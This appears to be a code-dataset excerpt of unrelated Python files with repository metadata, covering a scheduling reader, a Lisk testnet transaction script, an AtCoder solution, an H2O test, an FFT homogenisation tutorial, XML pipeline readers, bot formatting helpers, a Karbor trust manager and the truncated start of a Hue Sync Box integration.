| 37.493976 | 119 | 0.641067 | 347 | 3,112 | 5.570605 | 0.40634 | 0.028453 | 0.026384 | 0.019659 | 0.141749 | 0.141749 | 0.10657 | 0.10657 | 0.06208 | 0.06208 | 0 | 0.006037 | 0.25482 | 3,112 | 82 | 120 | 37.95122 | 0.827512 | 0.026028 | 0 | 0.044776 | 0 | 0 | 0.16518 | 0.051536 | 0 | 0 | 0 | 0 | 0.074627 | 1 | 0.044776 | false | 0.029851 | 0.149254 | 0 | 0.208955 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e6e31bd3c6e72131078bf0a6956ecb4db026ee | 649 | py | Python | scheduling/common/input.py | makspll/OS-Scripts | 021b0a569ee0e64cb8a8e23cdd5b7ea6104a8d99 | [
"MIT"
] | null | null | null | scheduling/common/input.py | makspll/OS-Scripts | 021b0a569ee0e64cb8a8e23cdd5b7ea6104a8d99 | [
"MIT"
] | null | null | null | scheduling/common/input.py | makspll/OS-Scripts | 021b0a569ee0e64cb8a8e23cdd5b7ea6104a8d99 | [
"MIT"
] | null | null | null |
from typing import List
from enum import Enum
from .units import Process, Unit, Track
class Mode(Enum):
PROCESS = 0
DISK = 1
PAGE = 2
class Reader():
def __init__(self) -> None:
pass
    def read(self, mode: Mode, path: str) -> List[Unit]:
        with open(path, "r") as f:
            creator = None
            if mode == Mode.PROCESS:
                creator = Process.parse
            elif mode == Mode.DISK:
                creator = Track.parse
            else:
                raise ValueError("No parser implemented for mode: " + str(mode))
units = []
for l in f.readlines():
units.append(creator(l))
return units
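# Illustrative usage (the input path below is a hypothetical example):
#
#   reader = Reader()
#   processes = reader.read(Mode.PROCESS, "input/processes.txt")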
| 20.935484 | 58 | 0.522342 | 79 | 649 | 4.240506 | 0.518987 | 0.071642 | 0.095522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007426 | 0.377504 | 649 | 30 | 59 | 21.633333 | 0.821782 | 0 | 0 | 0 | 0 | 0 | 0.001548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0.047619 | 0.142857 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e73606f7f41fdb21cfe2e7660f8da5614d729c | 957 | py | Python | pylisk/create_transaction.py | t-kimber/PyLisk | b303221eae5af85577866b61a665d58219f121cd | [
"MIT"
] | null | null | null | pylisk/create_transaction.py | t-kimber/PyLisk | b303221eae5af85577866b61a665d58219f121cd | [
"MIT"
] | 12 | 2021-12-15T13:21:06.000Z | 2022-01-26T13:05:38.000Z | pylisk/create_transaction.py | t-kimber/pylisk | b303221eae5af85577866b61a665d58219f121cd | [
"MIT"
] | null | null | null | """
Script to create, sign, and serialize a Lisk balance-transfer transaction.
"""
from hashlib import sha256
from pylisk.transaction import BalanceTransferTransaction
from pylisk.account import Account
def main():
address = "lskjks9w7v7wd6kg5gkt9eq5tvzu2w5vwfdc3ptkw"
acc = Account.from_info({"address": address})
bal_trs = BalanceTransferTransaction(
nonce=acc.nonce,
sender_public_key=acc.public_key,
recipient_bin_add=acc.bin_address,
amount=100000000,
)
NETWORK_ID = {
"testnet": bytes.fromhex(
"15f0dacc1060e91818224a94286b13aa04279c640bd5d6f193182031d133df7c"
),
}
seed_phrase_1 = (
"slight decline reward exist rib zebra multiply anger display alpha raccoon sing"
)
seed_1 = sha256(seed_phrase_1.encode()).digest()
bal_trs.sign(seed=seed_1, net_id=NETWORK_ID["testnet"])
hex_trs = bal_trs.serialize().hex()
print(f"{hex_trs=}")
if __name__ == "__main__":
main()
| 23.925 | 89 | 0.687565 | 103 | 957 | 6.106796 | 0.582524 | 0.028617 | 0.050874 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098274 | 0.213166 | 957 | 39 | 90 | 24.538462 | 0.737052 | 0.032393 | 0 | 0 | 0 | 0 | 0.243184 | 0.114504 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.115385 | 0 | 0.153846 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9ee3e2d59a60ee5b5ca120d2e41aae3d0a460cf | 256 | py | Python | submissions/abc120/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | 1 | 2021-05-10T01:16:28.000Z | 2021-05-10T01:16:28.000Z | submissions/abc120/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | 3 | 2021-05-11T06:14:15.000Z | 2021-06-19T08:18:36.000Z | submissions/abc120/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | null | null | null | a, b, k = map(int, input().split())
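# ABC120 B: find the k-th largest common divisor of a and b by testing
# candidates downward from max(a, b).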
mx = max(a, b)
match, ans = 0, 0
for i in range(mx):
if ((a % (mx - i)) == 0) and ((b % (mx - i)) == 0):
match += 1
ans = mx - i
if match == k:
break
print(ans)
| 18.285714 | 55 | 0.378906 | 41 | 256 | 2.365854 | 0.512195 | 0.092784 | 0.082474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033784 | 0.421875 | 256 | 13 | 56 | 19.692308 | 0.621622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9f61c14f73a64dee1f29930eb0caeda4f5890cd | 815 | py | Python | h2o-py/tests/testdir_algos/glm/pyunit_PUBDEV_6853_glm_plot.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-py/tests/testdir_algos/glm/pyunit_PUBDEV_6853_glm_plot.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-py/tests/testdir_algos/glm/pyunit_PUBDEV_6853_glm_plot.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
def test_glm_plot():
training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
Y = 3
X = [0, 1, 2, 4, 5, 6, 7, 8, 9, 10]
model = H2OGeneralizedLinearEstimator(family="binomial", alpha=0, Lambda=1e-5)
model.train(x=X, y=Y, training_frame=training_data)
model.plot(metric="objective", server=True) # make sure graph will not show.
try:
model.plot(metric="auc")
sys.exit(1) # should have invoked an error
    except Exception:  # a bare except would also swallow the SystemExit raised just above
sys.exit(0) # no problem
if __name__ == "__main__":
pyunit_utils.standalone_test(test_glm_plot)
else:
test_glm_plot()
| 30.185185 | 87 | 0.687117 | 117 | 815 | 4.555556 | 0.623932 | 0.061914 | 0.061914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034743 | 0.18773 | 815 | 26 | 88 | 31.346154 | 0.770393 | 0.08589 | 0 | 0 | 0 | 0 | 0.08637 | 0.036437 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.272727 | 0 | 0.318182 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9f972e3f0ce11289703edace28d7d79fca045c9 | 4,521 | py | Python | tutorials/03_exact_integration_simple.py | TruongQuocChien/FFTHomPy | 2c23c80dd2cab46f1090103e613b4f886b3daac7 | [
"MIT"
] | 18 | 2015-03-14T20:08:57.000Z | 2021-01-25T11:08:40.000Z | tutorials/03_exact_integration_simple.py | vondrejc/FFTHomPy | 2c23c80dd2cab46f1090103e613b4f886b3daac7 | [
"MIT"
] | null | null | null | tutorials/03_exact_integration_simple.py | vondrejc/FFTHomPy | 2c23c80dd2cab46f1090103e613b4f886b3daac7 | [
"MIT"
] | 10 | 2015-08-31T20:18:13.000Z | 2021-06-03T10:20:57.000Z | from __future__ import division, print_function
print("""
Numerical homogenisation based on exact integration, which is described in
J. Vondrejc, Improved guaranteed computable bounds on homogenized properties
of periodic media by the Fourier-Galerkin method with exact integration,
Int. J. Numer. Methods Eng., 2016.
This is a self-contained tutorial implementing a scalar problem in dim=2 or dim=3
on a unit periodic cell Y=(-0.5,0.5)**dim
with a square (2D) or cube (3D) inclusion of size 0.6 (side).
The material is identity I in matrix phase and 11*I in inclusion phase.
""")
import numpy as np
import itertools
from scipy.sparse.linalg import cg, LinearOperator
dim = 3 # number of spatial dimensions
N = dim*(5,) # number of discretization points
dN = tuple(2*np.array(N)-1) # double grid value
vec_shape=(dim,)+dN
# indicator function indicating the phase per grid point (square inclusion)
P = dim*(5,) # material resolution in each spatial dimension
phi = np.zeros(P, dtype='float')
if dim==2:
phi[1:4, 1:4] = 1
elif dim==3:
phi[1:4, 1:4, 1:4] = 1
# material coefficients at grid points
C = np.einsum('ij,...->ij...', 11*np.eye(dim), phi)
C += np.einsum('ij,...->ij...', 1*np.eye(dim), 1-phi)
# tensor products / (inverse) Fourier transform / frequencies
dot = lambda A, B: np.einsum('ij...,j...->i...', A, B)
fft = lambda x, N: np.fft.fftshift(np.fft.fftn(np.fft.ifftshift(x), N))/np.prod(np.array(N))
ifft = lambda x, N: np.fft.fftshift(np.fft.ifftn(np.fft.ifftshift(x), N))*np.prod(np.array(N))
freq_fun = lambda N: np.arange(np.fix(-N/2.), np.fix(N/2.+0.5))
freq = [freq_fun(n) for n in dN]
def get_weights(h): # calculation of integral weights of rectangular function
Wphi = np.zeros(dN) # integral weights
for ind in itertools.product(*[range(n) for n in dN]):
Wphi[ind] = np.prod(h)
for ii in range(dim):
Wphi[ind] *= np.sinc(h[ii]*freq[ii][ind[ii]])
return Wphi
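
# Aside (not part of the original tutorial): Wphi is the Fourier image of a
# centred rectangular pulse with side lengths h, i.e.
#   F[rect_h](k) = prod_i h_i * sinc(h_i * k_i)   (np.sinc is the normalised sinc),
# sampled at the double-grid frequencies computed above.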
def decrease(val, dN): # auxiliary function to remove unnecessary Fourier freq.
    dN=np.array(dN)
    N=np.array(val.shape[-dN.size:])
    ibeg = np.array(np.fix((N-dN+(dN % 2))/2), dtype=int)  # np.int was removed in NumPy 1.24
    iend = np.array(np.fix((N+dN+(dN % 2))/2), dtype=int)
if dN.size==2:
return val[:,:,ibeg[0]:iend[0],ibeg[1]:iend[1]]
elif dN.size==3:
return val[:,:,ibeg[0]:iend[0],ibeg[1]:iend[1],ibeg[2]:iend[2]]
## GRID-BASED COMPOSITE ######### evaluate the matrix of Galerkin approximation
hC0 = np.prod(np.array(P))*fft(C, P)
if P == dN:
hCex = hC0
elif P > dN:
hCex = decrease(hC0, dN)
elif P < dN:
factor = np.max(np.ceil(np.array(dN) / np.array(P)))
    hCper = np.tile(hC0, int(2*factor-1)*np.ones(dim, dtype=int))
hCex = decrease(hCper, dN)
Cex = ifft(np.einsum('ij...,...->ij...', hCex, get_weights(1./np.array(P))), dN).real
## INCLUSION-BASED COMPOSITE #### another expression of Cex
Wraw = get_weights(0.6*np.ones(dim))
"""HINT: the size 0.6 corresponds to the size of square inclusion; it is exactly
the size of topology generated by phi, i.e. 3x3 pixels in 5x5 image of PUC with
PUC size 1; then 0.6 = 3./5.
"""
char_square = ifft(Wraw, dN).real
Cex2 = np.einsum('ij...,...->ij...', 11*np.eye(dim), char_square)
Cex2 += np.einsum('ij...,...->ij...', 1*np.eye(dim), 1.-char_square)
## checking that the Cex2 is the same
print('zero check:', np.linalg.norm(Cex-Cex2))
Gamma = np.zeros((dim,dim)+ tuple(dN)) # zero initialize
for i,j in itertools.product(range(dim),repeat=2):
for ind in itertools.product(*[range(int((dN[k]-N[k])/2), int((dN[k]-N[k])/2+N[k])) for k in range(dim)]):
q = np.array([freq[ii][ind[ii]] for ii in range(dim)]) # frequency vector
if not q.dot(q) == 0: # zero freq. -> mean
Gamma[(i,j)+ind] = -(q[i]*q[j])/(q.dot(q))
# - convert to operators
G = lambda X: np.real(ifft(dot(Gamma, fft(X, dN)), dN)).reshape(-1)
A = lambda x: dot(Cex, x.reshape(vec_shape))
GA = lambda x: G(A(x))
# initiate strain/stress (2nd order tensor for each grid point)
X = np.zeros(vec_shape, dtype=float)  # np.float was removed in NumPy 1.24
x = X.reshape(-1)
# macroscopic value
E = np.zeros_like(X); E[0] = 1.
b = -GA(E.reshape(-1))
# iterative solution of the linear system
Alinoper = LinearOperator(shape=(x.size, x.size), matvec=GA, dtype=float)
x, info = cg(A=Alinoper, b=b, x0=X.reshape(-1)) # conjugate gradients
state = x.reshape(vec_shape) + E
flux = dot(Cex, state)
AH_11 = np.sum(flux*state)/np.prod(np.array(dN)) # homogenised properties
print('homogenised coefficient (component 11) =', AH_11)
print('END')
| 39.313043 | 110 | 0.656492 | 802 | 4,521 | 3.67581 | 0.293017 | 0.030868 | 0.020353 | 0.020353 | 0.158752 | 0.138399 | 0.107191 | 0.107191 | 0.074627 | 0.059701 | 0 | 0.027675 | 0.160805 | 4,521 | 114 | 111 | 39.657895 | 0.749341 | 0.180491 | 0 | 0 | 0 | 0 | 0.190613 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.04878 | 0 | 0.109756 | 0.060976 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9f9c4d3526307e32a5500958c3dd33e1cedd8eb | 2,289 | py | Python | pipeline/io/xml.py | probonas/pipeline | 96f565f2d827498efd31a7e76b74e0394ef2abc1 | [
"Apache-2.0"
] | 5 | 2020-04-11T15:12:07.000Z | 2021-09-13T04:15:47.000Z | pipeline/io/xml.py | probonas/pipeline | 96f565f2d827498efd31a7e76b74e0394ef2abc1 | [
"Apache-2.0"
] | 46 | 2019-04-22T20:36:40.000Z | 2022-01-12T18:03:32.000Z | pipeline/io/xml.py | probonas/pipeline | 96f565f2d827498efd31a7e76b74e0394ef2abc1 | [
"Apache-2.0"
] | 2 | 2020-05-27T20:49:53.000Z | 2021-03-17T04:21:38.000Z | import sys
import lxml.etree
from bonobo.constants import NOT_MODIFIED
from bonobo.nodes.io.file import FileReader
from bonobo.config import Configurable, Option, Service
class XMLReader(FileReader):
'''
A FileReader that parses an XML file and yields lxml.etree Element objects matching
the given XPath expression.
'''
xpath = Option(str, required=True)
def read(self, file):
root = lxml.etree.parse(file)
for e in root.xpath(self.xpath):
yield e
__call__ = read
class CurriedXMLReader(Configurable):
'''
Similar to XMLReader, this reader takes XML filenames as input, and for each parses
the XML content and yields lxml.etree Element objects matching the given XPath
expression.
'''
xpath = Option(str, required=True)
fs = Service(
'fs',
__doc__='''The filesystem instance to use.''',
) # type: str
mode = Option(
str,
default='r',
__doc__='''What mode to use for open() call.''',
) # type: str
encoding = Option(
str,
default='utf-8',
__doc__='''Encoding.''',
) # type: str
limit = Option(
int,
__doc__='''Limit the number of rows read (to allow early pipeline termination).''',
)
verbose = Option(
bool,
default=False
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.count = 0
def read(self, path, *, fs):
limit = self.limit
count = self.count
        if not limit or count < limit:
if self.verbose:
sys.stderr.write('============================== %s\n' % (path,))
file = fs.open(path, self.mode, encoding=self.encoding)
root = lxml.etree.parse(file)
for e in root.xpath(self.xpath):
if limit and count >= limit:
break
count += 1
yield e
self.count = count
file.close()
__call__ = read
class ExtractXPath(Configurable):
xpath = Option(str, required=True)
def __call__(self, e):
for a in e.xpath(self.xpath):
yield a
class FilterXPathEqual(Configurable):
xpath = Option(str, required=True)
value = Option(str)
def __call__(self, e):
for t in e.xpath(self.xpath):
if t.text == self.value:
return NOT_MODIFIED
return None
def print_xml_element(e):
s = lxml.etree.tostring(e).decode('utf-8')
print(s.replace('\n', ' '))
return NOT_MODIFIED
def print_xml_element_text(e):
print(e.text)
return NOT_MODIFIED
| 23.121212 | 85 | 0.676715 | 326 | 2,289 | 4.601227 | 0.337423 | 0.042 | 0.037333 | 0.058667 | 0.275333 | 0.234667 | 0.18 | 0.18 | 0.18 | 0.18 | 0 | 0.002142 | 0.18436 | 2,289 | 98 | 86 | 23.357143 | 0.801285 | 0.138488 | 0 | 0.253333 | 0 | 0 | 0.098563 | 0.0154 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093333 | false | 0 | 0.066667 | 0 | 0.426667 | 0.053333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9fac466d61fa4e1209093752784a51baa09d5f3 | 3,063 | py | Python | YukkiMusic/utils/formatters.py | VasuXD/YukkiMusicBot | d7fdbd46d9fc793daedf624fa34fe644119bcb25 | [
"MIT"
] | null | null | null | YukkiMusic/utils/formatters.py | VasuXD/YukkiMusicBot | d7fdbd46d9fc793daedf624fa34fe644119bcb25 | [
"MIT"
] | null | null | null | YukkiMusic/utils/formatters.py | VasuXD/YukkiMusicBot | d7fdbd46d9fc793daedf624fa34fe644119bcb25 | [
"MIT"
] | null | null | null | #
# Copyright (C) 2021-2022 by TeamYukki@Github, < https://github.com/TeamYukki >.
#
# This file is part of < https://github.com/TeamYukki/YukkiMusicBot > project,
# and is released under the "GNU v3.0 License Agreement".
# Please see < https://github.com/TeamYukki/YukkiMusicBot/blob/master/LICENSE >
#
# All rights reserved.
from typing import Union
from pyrogram.types import Message
def get_readable_time(seconds: int) -> str:
count = 0
ping_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
if count < 3:
remainder, result = divmod(seconds, 60)
else:
remainder, result = divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for i in range(len(time_list)):
time_list[i] = str(time_list[i]) + time_suffix_list[i]
if len(time_list) == 4:
ping_time += time_list.pop() + ", "
time_list.reverse()
ping_time += ":".join(time_list)
return ping_time
def convert_bytes(size: float) -> str:
"""humanize size"""
if not size:
return ""
power = 1024
t_n = 0
power_dict = {0: " ", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
while size > power:
size /= power
t_n += 1
return "{:.2f} {}B".format(size, power_dict[t_n])
async def int_to_alpha(user_id: int) -> str:
alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
text = ""
user_id = str(user_id)
for i in user_id:
text += alphabet[int(i)]
return text
async def alpha_to_int(user_id_alphabet: str) -> int:
alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
user_id = ""
for i in user_id_alphabet:
index = alphabet.index(i)
user_id += str(index)
user_id = int(user_id)
return user_id
def time_to_seconds(time):
stringt = str(time)
return sum(
int(x) * 60**i
for i, x in enumerate(reversed(stringt.split(":")))
)
def seconds_to_min(seconds):
if seconds is not None:
seconds = int(seconds)
d, h, m, s = (
seconds // (3600 * 24),
seconds // 3600 % 24,
seconds % 3600 // 60,
seconds % 3600 % 60,
)
if d > 0:
return "{:02d}:{:02d}:{:02d}:{:02d}".format(d, h, m, s)
elif h > 0:
return "{:02d}:{:02d}:{:02d}".format(h, m, s)
elif m > 0:
return "{:02d}:{:02d}".format(m, s)
elif s > 0:
return "00:{:02d}".format(s)
return "-"
formats = [
"webm",
"mkv",
"flv",
"vob",
"ogv",
"ogg",
"rrc",
"gifv",
"mng",
"mov",
"avi",
"qt",
"wmv",
"yuv",
"rm",
"asf",
"amv",
"mp4",
"m4p",
"m4v",
"mpg",
"mp2",
"mpeg",
"mpe",
"mpv",
"m4v",
"svi",
"3gp",
"3g2",
"mxf",
"roq",
"nsv",
"flv",
"f4v",
"f4p",
"f4a",
"f4b",
]
| 22.195652 | 80 | 0.501469 | 405 | 3,063 | 3.679012 | 0.387654 | 0.044295 | 0.028188 | 0.046309 | 0.142953 | 0.048322 | 0.048322 | 0.024161 | 0.024161 | 0.024161 | 0 | 0.046523 | 0.319295 | 3,063 | 137 | 81 | 22.357664 | 0.668106 | 0.106105 | 0 | 0.053571 | 0 | 0 | 0.085138 | 0.009908 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.017857 | 0 | 0.151786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9fea1cdc53e3c61b7fd002e8743d6e65365ae7f | 3,742 | py | Python | karbor-1.3.0/karbor/services/operationengine/user_trust_manager.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 1 | 2021-05-23T01:48:25.000Z | 2021-05-23T01:48:25.000Z | karbor-1.3.0/karbor/services/operationengine/user_trust_manager.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | karbor-1.3.0/karbor/services/operationengine/user_trust_manager.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from karbor.common import karbor_keystone_plugin
LOG = logging.getLogger(__name__)
class UserTrustManager(object):
def __init__(self):
super(UserTrustManager, self).__init__()
self._user_trust_map = {}
self._skp = karbor_keystone_plugin.KarborKeystonePlugin()
def _user_trust_key(self, user_id, project_id):
return "%s_%s" % (user_id, project_id)
def _add_user_trust_info(self, user_id, project_id,
operation_id, trust_id, session):
key = self._user_trust_key(user_id, project_id)
self._user_trust_map[key] = {
'operation_ids': {operation_id},
'trust_id': trust_id,
'session': session
}
def _get_user_trust_info(self, user_id, project_id):
return self._user_trust_map.get(
self._user_trust_key(user_id, project_id))
def _del_user_trust_info(self, user_id, project_id):
key = self._user_trust_key(user_id, project_id)
del self._user_trust_map[key]
def get_token(self, user_id, project_id):
auth_info = self._get_user_trust_info(user_id, project_id)
if not auth_info:
return None
try:
return auth_info['session'].get_token()
except Exception:
LOG.exception("Get token failed, user_id=%(user_id)s, "
"project_id=%(proj_id)s",
{'user_id': user_id, 'proj_id': project_id})
return None
def add_operation(self, context, operation_id):
auth_info = self._get_user_trust_info(
context.user_id, context.project_id)
if auth_info:
auth_info['operation_ids'].add(operation_id)
return auth_info['trust_id']
trust_id = self._skp.create_trust_to_karbor(context)
try:
lsession = self._skp.create_trust_session(trust_id)
except Exception:
self._skp.delete_trust_to_karbor(trust_id)
raise
self._add_user_trust_info(context.user_id, context.project_id,
operation_id, trust_id, lsession)
return trust_id
def delete_operation(self, context, operation_id):
auth_info = self._get_user_trust_info(
context.user_id, context.project_id)
if not auth_info:
return
operation_ids = auth_info['operation_ids']
operation_ids.discard(operation_id)
if len(operation_ids) == 0:
self._skp.delete_trust_to_karbor(auth_info['trust_id'])
self._del_user_trust_info(context.user_id, context.project_id)
def resume_operation(self, operation_id, user_id, project_id, trust_id):
auth_info = self._get_user_trust_info(user_id, project_id)
if auth_info:
auth_info['operation_ids'].add(operation_id)
return
        lsession = self._skp.create_trust_session(trust_id)
self._add_user_trust_info(user_id, project_id,
operation_id, trust_id, lsession)
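
# A minimal flow sketch (illustrative; `ctx` is a request context and `op_id`
# an operation id, neither of which is defined in this module):
# mgr = UserTrustManager()
# trust_id = mgr.add_operation(ctx, op_id)      # first call creates a trust + session
# token = mgr.get_token(ctx.user_id, ctx.project_id)
# mgr.delete_operation(ctx, op_id)              # trust is deleted once no ops remain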
| 35.980769 | 78 | 0.646713 | 492 | 3,742 | 4.528455 | 0.223577 | 0.056553 | 0.06912 | 0.087522 | 0.48474 | 0.450628 | 0.402603 | 0.366248 | 0.286355 | 0.218133 | 0 | 0.001837 | 0.272582 | 3,742 | 103 | 79 | 36.330097 | 0.816679 | 0.145911 | 0 | 0.422535 | 0 | 0 | 0.053442 | 0.006916 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126761 | false | 0 | 0.028169 | 0.028169 | 0.295775 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9fec7c77af3629a8aa1a529833cc19bcd959e3d | 7,309 | py | Python | config/custom_components/huesyncbox/__init__.py | LRvdLinden/homeassistant-config | 4f0e8bb08329b8af08fc90cb1699a9314e297ab7 | [
"MIT"
] | 288 | 2021-04-27T07:25:04.000Z | 2022-03-23T14:38:36.000Z | config/custom_components/huesyncbox/__init__.py | givemhell/homeassistant-config | 8ca951d299cb4df19e5fcc37bfea38c9f04f5a2a | [
"MIT"
] | 6 | 2021-04-30T10:47:24.000Z | 2022-01-12T01:14:15.000Z | config/custom_components/huesyncbox/__init__.py | givemhell/homeassistant-config | 8ca951d299cb4df19e5fcc37bfea38c9f04f5a2a | [
"MIT"
] | 28 | 2021-04-30T23:58:07.000Z | 2022-02-15T04:33:46.000Z | """The Philips Hue Play HDMI Sync Box integration."""
import asyncio
import logging
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers import (config_validation as cv)
from homeassistant.helpers.config_validation import make_entity_service_schema
from homeassistant.helpers.service import async_extract_entity_ids
from homeassistant.components.light import ATTR_BRIGHTNESS, ATTR_BRIGHTNESS_STEP
from .huesyncbox import HueSyncBox, async_remove_entry_from_huesyncbox
from .const import DOMAIN, LOGGER, ATTR_SYNC, ATTR_SYNC_TOGGLE, ATTR_MODE, ATTR_MODE_NEXT, ATTR_MODE_PREV, MODES, ATTR_INTENSITY, ATTR_INTENSITY_NEXT, ATTR_INTENSITY_PREV, INTENSITIES, ATTR_INPUT, ATTR_INPUT_NEXT, ATTR_INPUT_PREV, INPUTS, ATTR_ENTERTAINMENT_AREA, SERVICE_SET_SYNC_STATE, SERVICE_SET_BRIGHTNESS, SERVICE_SET_MODE, SERVICE_SET_INTENSITY, SERVICE_SET_ENTERTAINMENT_AREA
CONFIG_SCHEMA = vol.Schema({DOMAIN: vol.Schema({})}, extra=vol.ALLOW_EXTRA)
PLATFORMS = ["media_player"]
HUESYNCBOX_SET_STATE_SCHEMA = make_entity_service_schema(
{
vol.Optional(ATTR_SYNC): cv.boolean,
vol.Optional(ATTR_SYNC_TOGGLE): cv.boolean,
vol.Optional(ATTR_BRIGHTNESS): cv.small_float,
vol.Optional(ATTR_BRIGHTNESS_STEP): vol.All(vol.Coerce(float), vol.Range(min=-1, max=1)),
vol.Optional(ATTR_MODE): vol.In(MODES),
vol.Optional(ATTR_MODE_NEXT): cv.boolean,
vol.Optional(ATTR_MODE_PREV): cv.boolean,
vol.Optional(ATTR_INTENSITY): vol.In(INTENSITIES),
vol.Optional(ATTR_INTENSITY_NEXT): cv.boolean,
vol.Optional(ATTR_INTENSITY_PREV): cv.boolean,
vol.Optional(ATTR_INPUT): vol.In(INPUTS),
